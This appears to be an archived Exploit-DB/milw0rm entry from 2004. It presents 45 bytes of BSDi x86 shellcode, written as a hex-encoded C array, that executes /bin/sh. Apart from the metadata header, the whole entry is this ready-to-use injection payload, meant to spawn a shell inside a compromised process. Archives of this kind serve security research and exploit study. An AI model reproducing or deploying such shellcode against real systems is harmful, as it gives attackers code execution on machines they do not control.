BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)

EDB-ID:

13257

CVE:

N/A


Author:

duke


Platform:

BSDi_x86

Date:

2004-09-26


/*
 *  BSDi
 *  execve() of /bin/sh by duke (duke@viper.net.au)
 */

char bsdi_shell[]=
  "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
  "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
  "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00";

# milw0rm.com [2004-09-26]